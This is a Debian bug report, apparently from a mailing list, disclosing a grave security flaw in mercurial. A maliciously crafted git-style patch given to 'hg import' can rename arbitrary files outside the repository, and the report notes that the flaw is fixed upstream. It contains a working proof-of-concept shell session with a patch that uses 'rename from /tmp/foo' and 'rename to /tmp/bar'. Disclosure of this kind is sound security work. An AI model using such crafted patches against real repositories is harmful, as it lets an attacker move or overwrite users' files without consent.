Package: mercurial Severity: grave Tags: security, patch Justification: user security hole
Hi It is possible to rename arbitrary files, even outside the repository by using a maliciously crafted patch. Proof of concept: echo quux > /tmp/foo cat /tmp/foo /tmp/bar quux cat: /tmp/bar: No such file or directory hg init hg-sandbox; cd hg-sandbox hg import - <<EOF > diff --git a/a b/b > rename from /tmp/foo > rename to /tmp/bar > EOF applying patch from stdin /tmp/foo not tracked! abort: /tmp/bar not under root cat /tmp/foo /tmp/bar cat: /tmp/foo: No such file or directory quux The issue has been fixed upstream[0]. Please upload with high urgency to make sure the fix reaches testing soon. Cheers Steffen [0]: http://www.selenic.com/hg/rev/87c704ac92d4 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
